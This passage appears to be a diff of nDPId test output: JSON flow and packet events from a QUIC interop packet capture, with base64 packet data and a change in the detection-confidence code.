gjbcm3dvzdusN6QEHoBwehHTuwg2LVAOrhrdwgJHwD24nAbkGvZS6207+R+dDWgjErFMPgJjQk90HJrSxW3PVzyhqFF8r1HhvahtRcrGLHjwGBKNWw\/mrkVazrYWToNHELFQGA97zWhxG8ZSHR+27fKaBvWg5SNzSWU2wqAon3FV4zTetTXEb9zkLHsi2S8+hrVzPvDpUzxu5LCvszrotwPRcXWgIMpfFuHdDkZxnUc45aPM4oNaKzuB\/0K41UWRnLrJN6\/+98eIMaltlc4V06CpAS5gYRWr9oVtc+QkkWRldnz37SdoLKl8j4QpdxDKnGiBhtH2t7EGBZvilk2\/E0n1dYaPhlbDUz8OHPLZKVRSX+2OC6kXAYMmbeaPeYmlTGxdw7MpypCb0e78htplM7XmCygTm7xO55EtSdHoQEqVVTNOIIkzaRk0or7ix1b+Ac9bulavsll9eLerk9aXIedIpmtLAhpid4yPMzOfK14JMJmXBfXb5Bmo\/4e2X5MhFs1h6MDiN0sF8lsZJljJ9S5QgvPFUHTbEgZwtOqgzvOm6MsHiV4dCQU3zeds93rktywyH+Qpw1nOVbV0RHa72zd0Io5tIKuEbGJ4DvYBtvaNEL2GzNcfpg1SNHmTLW9FsceE8YJg9q1N4VFcd0DPFy5W443yNter3ub6Z+8DDshzGfLalC9+Gxtga2a8QCpuk8EpMk+hYjiHRQMcz0FVALld4YdzH4Q7aHFNufiFtsQORs2elcXiDr+suYZd\/KbghskPHXcWBEvZ87I+FVy0zTnkd6sN9nVlJxmggfsaoPYeNUd
Cjf4aj8XSdzugsx\/gjaDcmur3C2vSPf7TTH0vuXm+WJUiYbW8mepVZGo\/Ab4kEw9z6H9LiIvVjV2bJog+FgNpi+bCuPZrXaL1QVg16ASOkMyJEOBJ\/ApwZq1c+0SVVETGYjpibsmHYU2g=="} -01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434648,"flow_last_seen":1603816434648,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1603816434648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434648,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAVWdAAEARtqvAqAGAEr1U9YhXAbsE7B\/jxQoKCgoI8ujrluq3MPgAAETSSw3nndZy2B\/JR\/aFheBm1Am1dhHdGKFX4rQi398jOJ+Jn+ueiHb2+ayhrixzGiiTN9ufhk4Lx76CWjuYMe1esceEF2U0qEsZzm5HKOUSMwSJ5RaG7eBb\/NGtId7Q6oJPV32C4GXJOjD2zUmbaepzk+oaGFaN7rBeaveWtYLwkm3MCtZ9ixGvt1GVcZjsd3UxnGM0OVZjCX0r80DcWyuTZ+venG\/PF8dpMDihqsZpbR3kCGTkK2uMnVKt5rsbq8Q3DZ4G5gYRlETl0tKNNk\/HmutyUjflzkkuvzr4zZfbMn0fPfDD0j7mcNxEYvvd0jng9gG7f2g5c2cWdEOeL32TJuGaUD4LxEgTmtQ74vLlqJ2jtPbB5cHftJfgjUFjPeNm\/TPJhWl+3\/2FaFh7UtvKIQZYWOKggBRpbC9DfYZGBlcBdT4cVCcoYVYvdnofibyJj7qvtk9aBhQ8X8haBJHnwUiu9Fh6LP38l6DOudy0wo3ZglGsYmVQyJ13TOTkHezaV+ftjH2Ic2\/kdq8i3gBc5XmSKkmTiDbR3CJC6bVKLX4YKbycr7PwvmeAgaIww6YUv5UVh+vhnxqslyCYJ54KMPJqDqUt8WhJ8Cyji43HCRRNG5kipptq8jUrAU8gn
wzNfotH5yFDF+SAJ3QrzY\/5UXiv\/luWN+jwEASOuxa49aAiqVUa6A2J9z+IULgzW9aUufnh8e6ojNPCROl0NOCqRnl5cZCiCryKj\/+UTBEx39zm8tG1rMtKw8QCLVg0thBdHS0CguNqIcZrFjoob99Ht9nweYVHyIifEGHrneZFx6IaFg2N2+vqZttN1BPnlJwB5SkjsSGnctAq0WWDJg53X0egLh7DxbpeFvo\/PmlH\/qw8mjFt+NYPN0Ckt589t68fWjAbTRqz6xR6iPzgtt26G5g9GSc+owtcPOoKDSY+FtfvQEy2FDAKor8oRuyToRIFoS3GHrsVAzOLHHMrzcmpnrq0hajchpZRX9\/japhKPdmJTqsBb+ql5oZkXtBdENW3VUtixBzrUWiVbOkyqYBTjYwbASaX1s4B0v9Dw3fdaQktg0huYIDe3RIztuWGLVXFqL3kiPstObyRA8wmGdfn5WqodpZ8U9Vfz6QFfvCBcYE1\/TFuOxsVuCGHj1fKdzqDxFgpT\/6zI3IgHHNl0RstA3RkolWL6H0I5f1KqOUjo7bKGh\/fgABUsvMtkL2jljWloerb\/OyZ8cMJbX4NbVoNGdWP6RjJXhmtbLlmGjr\/nG9lw0JPerfXWXztQQ84uR0ZUAsCJbt6PCEcektnL94QlE49op9jLT5v5WzhOshdDsHI9kPLgiBlXhxtuB\/4fh64dFKwIV\/bkeadS+6vx09Jc7DjJDplds16bxuhHniXD1+VLQYqMNvLfkmfXTcvt+DCDI5+MtT64WEYlvBN\/oRfvKNXOlpG0nbSIxax56Y8i7ywQwgVXRD\/tgIY5hSIvokl8C2Vtnw0ocpu1kRHmBam5VO2gvUlslhf1v2Z1lhZ3ZHKYC+go+hJTIN8eMiQlcB94ueuvx1ZXgPZAWpEgcGBa59R7aGipRkAIOU7VFYiFm+JgHn0wlJi1ePUMn2SyyfRo+5s5CeNkA7rfixGxD37LoDcJtDM1uCusOgWzzaoPX\/WMg=="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434648,"flow_last_seen":1603816434648,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434648,"flow_last_seen":1603816434648,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1603816434650,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"thread_ts_msec":1603816434650,"pkt":"PKn0qB\/spJGxgjQ5ht1gDoRdACsRNCoArABAAAQAAuBM\/\/5oGZ0gAQsHCsnVrqTT\/kdpHoB9EVHuNwArYcCQAAAAAAAIF6TDw+yG4BdFR0cg\/wAAIP8AAB\/\/AAAe\/wAAHQ=="} 
00644{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434652,"flow_last_seen":1603816434652,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434652,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1603816434652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434652,"pkt":"pJGxgjQ5PKn0qB\/sht1gAVD8BNgRQCABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWsxwRUQTYTRjACgoKCgjaL32MZj\/FsgAARL5kzfCcIzgmsxjP0G4DqL4uwGMN6uFXlzXIqULUmbWkTZimqkIWYk5J+U1Tm2aqd1MjW9rzMqELFmlAhlXckjXGsH+Agbi5yNw7OuSd0A2jkDOUIsWCSOJHKlMr0ObsMh5yal2tl2VuEVfSE0qsFV7WLAeEJZABZmjJDxwfk918siEfP+aSaQvEgBBkJ84hGcxa0pyg3zr9AdvoDzmITNfcVD\/SbxorVKGQTTyoV2KjJ4ODNMmCAzaGCyDD6BHN+TqaVnIG75iUky\/i00OWO2itqTOK5MK0gg\/F4dmZXxYm544SXt3mEIMn\/KiT58TB8AnvvoMM+zDcLjD2voYO7w6nQ7vjIZtfT9m3XWOP8J9F0bvPBS9+vGZTprqiR2e6PBnSg0KmchSjlKU1RP+jKuqXA5YZOjOGqV6O\/fewKbV40io0i1J+NIHqJBZhd5bjjAjtEL0\/jGHCJT8+kHWQVRnVxvJTULFHfSoFaOv0\/FAPPgQmAsV\/e7ePRse7PiP7AO9qzUpNTBIaRi7R7yEx60bIoFeYOSNhxPoca1fCTIiqpbf\/Lysq6HvKKUzNT0W7O4lfkb\/ZC1VhUlt7Od+qJCiRwXxU9D\/42IwUin8sjlUvg+KRX5ulSQOPGOYufZ92sil2AWQyHIIFULLz407V9+RW+9E6Q7FjwFkZOFtY3aV1T\/8FTKaaOHGLazcJjKUaGZC8AA2F6I9PGcFFC9RAXizVtqzUQ+iviDhJ+goUzdUB1agAa\/MIn7DGkbkQVOtD+1M6CKkE7hHdmiQ9n16NW3fCjz4YqlEqNM80RgogewW7AOxtVLzwj56n0cG2wRWB+Haw
QfkQIDtIJqSHPWB9OkV6tfXkJfbT2wlbh\/rfKSskLrk1sbYzY1PIDNmPjLRCZBVWmCYLPffYkG+b4MwNHB\/vAIrvElJ1puJF7jpzzegk3uRCXIKeAvnSIueoT+dVtLnf0DjT1SjmwFUtovRpxxTHtgK78PEBaNK+CFnXBiyxXF88QJhaPeav6oIj92LBjRUaBtpFYrGT7ukwX0CZJH6ss8DKRBYG8o1LXxAiSMdCM85xU\/D1l5JAQtiGzlNDH3qXy62dPdPRzmBTdsEvCTu1SJ4aTQ5HqZkZ8mdXkv1vSCrhXtjNjyM9ISkMXQl7Fv4snypY5dWEXtwWFf\/DXWrXLzy8bkZnUz7iRb5Ma6ol5Xky3YnWYit6Oy8bYeuXHVcQl7yxHmQFX9vlhcsmh3du6Au3WEc7fVr5+pChwI9eXXokYUBC373Pa\/y2+Tfslyg9\/dYBdfu3HiD4BKHBgCptEzxjJJoRocgeQEgIyTxnLazyy7tsTNsUIYjWNFhWoL2xJFntqowob7P44+WFAm6ZkZovEYYNmSKqBxSG9wAPXekCbXtH\/b+TOIK9+1XfTT1IrbkxQYHWASoekr6WZeU4jYlWrrn8X8ujjTBW3jswDbT7J2Z+rUudTp2RtVzFLtpsMRieCSQBEact92jCCupbg43ThfRz5r1sA\/97BYUtprJqYvONm9iufuMRRuGLpd5h9EBpE9lEEKcLT0QIsIjALGWNfhWnZdIJLXqAQgypProR3AsmTwuLfn7lEfngyfzJ6wUdezbTEtlDAdR3wg=="} -01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434652,"flow_last_seen":1603816434652,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434652,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434652,"flow_last_seen":1603816434652,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434652,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434656,"flow_last_seen":1603816434656,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434656,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1603816434656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434656,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAlgNAAEARiNrAqAGAhfLO9LMfEVIE7Eh3wgoKCgoIJ05Q063kdsUAAETSbLaK1YIdjfFKFulEh8Y2sf\/rINJYpnSz+n\/2QdD9ZhLptcSvy2R2VY8k3My6fIvL6mAk+uMpn4smDS1KptYa2flod7AFdpBN3VvGtMn8LYTKEkOwUsRO7TdqEPawLRWOABxPUqjQjdCeFgLJNdZk5RA07LTgVWI2Yu12LDx4casOusyaOV0FFb2psXZWvD\/rRGJTjSUwimMA87gUlPjAdz\/gfYKA8J81JCdeNyPB5kQpQZK9Ag3U\/SNi8mmglOJkOcsW2kP9tVz80xUx+vHEMYcRJEAektIaWVqW\/qsi2o67TUfHR2EXa8XSNf6EPfTjaOmRYh3mFcNDcJgd2kz2KAnh3V0gkKSqu2uEJA5\/mg\/TnJn0\/l1UAulF72+p5R9Pa32JoZ5rRGN1BakDzPrffOR0TvFE3y\/+FghM6Dz\/8uzCybhNc7sfFp+p4ZUoUBdN3i5d0NPyFY2gHyQomOn9rjU73nYYIseeZ+nhRO7YbCjkbUB\/yYwkJmFOh0TvqwzYznQgk7lfr\/md+bsxGFCUVM4aVxtYqCyilzNHjx2\/0uQ9PwLviLCGbf\/DMQiUcVNp3cYBqz7DJUy+OlRTk8hlbBxWecwj0pbXbnMQduOagYXqgiomaGUVKDGlda0JCfvvNO757eKuRy0mLdjIpqHD1NEufFqbaSMZUn9grkimQ69ppIErnAUuDQMJRIyzqNcJHugVGEq5oP7QdlfZ7lr3jOBT7HkZcNEd8AV47qJgoKU5q4NGc0J71Pw2YVYd1scb3A1vWRIVsIkczT7yuDAKiAClVSuNQLnIvJw4l6s7CUlk6S8uK69+4Ltr75BolBxMCVoHkM5b\/orqVfR0OqNi+hCYxsYJghq7xN9bXvYCpq2kqvymjFiL1hosZ8LqBqlbZ+KRpjwV61KCcoVqNasJru7kBOCt\/mWTssvQAORaUq8Mlwn9y2PykyJGeVKaSASOiRacPdV4HuhCOQcDfRB9yNMfMAnpvVeDH6VS7MdAdMQe93Qrtp1QeP8VO2rTCCN91AOit2V+QXCvc+BbYXTvvH3JkKThYqcH8rRbxqdDTPq\/wWim7\/0lqkWBCggizFSqTrUIDXVpjQPuUhy\/WRzxkYSIc7u5fZ6sIq5eN5m9fXx2vD43Yq+l1Ghb4xvwIneJ5NUn2eFk1R6ttVwWQjusN7oyMgG5gj6hjohBbMiM6VLvBdJqqabe+fqfPuIkbGqi\/pSgVmd7J7gTSQs7\/paaiImg8sm4Mq97uvoFIBYp8yYjmKJB82W7bOZiqV49vTn0RrZTlVVPlHFQX2WpjZTpwwz0jIKKplJsVkyi1FG+BOFx+GyxlIihWz4PLKtSgOENeMXtz0\/b7SoSYOWhsCG2\/\/f948c1r4PeUvRu7XqduuojNmHxpahHKwAwVmNhkRHsAbP5zW9qP6XfWnsVWmx0bN7aP5npP3hrOKyfrsV\/5FkNliWd9jR5UNuOo4OtgXCghNfW4LyOPBq4jsogY2TorxYEYK\
/ICauhkE1t2zAYwcvA9jNm0x1R4D\/Sm+97z\/rPAGHRZcrG9A3EB6U09uwydYieU6kZpUiZJOYWACk9HUxtfhKSNARDjWcNCzM7bpArmDYB3hnejZrmrPbFxj58+oKmg6IVgKVFjNIQGjV1OHopPg=="} -01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434656,"flow_last_seen":1603816434656,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434656,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434656,"flow_last_seen":1603816434656,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434656,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1603816434657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434657,"pkt":"pJGxgjQ5PKn0qB\/sht1gCNHwBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUlL0BuwTYQzDKCgoKCgjBjvWe+MPFRAAARL4g348kA8mQBcAOi\/Ea5lVgGbx\/7eo9z03nW8pQoHBEiVFxap\/J7yF0T4ETOiXRrEVFzfKu4cp9\/aIHD8VuqdmnRI7ZUzH6nHP6t6XgWjPLu9gwncGiNpy\/62Nk4XPzeji4OQEhiV2wvPwilhPjz1Iw8tA6gxIE\/FJ4VwrM+jhjDDGeJX9BSVBF51kNOZwIfVwErkoa\/qCvtHlDAlGsd67naWgwRHPQ1nkSJwo+9sQMQloIehnYy66qr7McaNefwAbFS5vujjFD0bYEmGDHKA\/F\/y+3qGlJupB5YPSp8wB7Am1v5JD+D\/bG5B5luaL\/5MF\/tQnBG2dxtea8LZG5G\/eV6LyP9L4ooo4IJyvTlEaQ\/ZOeKwlHxchtWnc9B1fL75AWTflk927t027mF4gEUpMwkx4RQMESzJeKbiKyR6Kju8+GylIujiTUOWwe8Pt6FKBiAZLgvlK4YR6upjyxAj1yifEMXI9ck\/VO\/Ck0PU3TrRtvDl\/wfNsVtESwzsMNhYfkwDEb9HKwo5a2\/kMDB2oZkX2VNVeOAH0n3s8tB9WLVe8oKkFTUmog+0QRsMIpnLCWQ75LQKoJv6O1XJQVMkvkriwokuRy8CCP4EpIlVSvXuFArfX\/fbTPCluQ1NH50zOP6ysMQboAYq5P1UCN4zcLGWZaVbF9oa1jAJ6PadCu1EtWpxyNeTUpAe5jtCvh1Ek99dEg6bQ+j6gvn\/Yz8AhHWVisS\/4VPgx2sHYS2FDc4ug9W6gsAFExY3uSitd7XjxK\/bL1oNU+b0jZOhnX4xE5mnhbxzHNAKXSXB2aWDY3+BQWmASrCC3UyA8\/hE91TFVnfAmnegiopiURKjvi8DWlsXJi98UivPepk1KIUkyuwYljhDbFg+Ju8PdCQIp1RdqDT1rPQsla4QcsyF\/NLkn03\/oiCiTPViBgeLpx5IDNsz\/E5PKe7HtjsCqTGdF3JcVQGRMcs6XuK6eeXR39paD1+Ap5R7y4jtTYGF3ERVJnfLPi0OImMpLV78BBWUIiuk57yx\/ByVw1Vi231q0R5hJu+2UkRPleoRsn22QwOy5Wyt6YCa9Njzu+jmkM5SaTLiDskQIXBb6CNyIxDTqisRatDtzI4tGgpDJJrJLyZRRjwm4IUGl4MEcnCWz9P+nJkKiW91BFFECvItcE6tRgENAP6B07ROBWB4xJBDVhnX0WgQS8bETOrbEby5WFiD92Zha2iJfBanxLrhkMlyxfJQvY++OklEMvIXt3v8l2q3dZWFOn4kyW
KCN09iij0w0AEDsYLWJZuX4Wd4BeQXUc0TQSuDLkBeoncn1cOIA9nbBX5JYvyr8xLwXYv1YbXFHRI\/Z6kEVdG+BSe850euHBVqJOat4IdCKJnu6NuFXRzdJnMp9gCv2PvmYfbsW9v5iJpCEm0G5joiY+1mWnVbfZAO5JyrBGv3ibTwQYFw\/SIY85UIif3wl0VVblUQH81ysGAOBc9Qkl\/ZLs9Nmdqg326DSTscTecRmY2x8\/F6T2e\/IU6BMaPO19yi\/FICyG9IeO7SjydAWQ627DK5c9b4kcDrf56O+pK9aBvIiTOBgdfw7wCNgDwIOMnK6gKccj4qLA25Wlz7z4n6yBivDMYJeK5g=="} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434659,"flow_last_seen":1603816434659,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434659,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 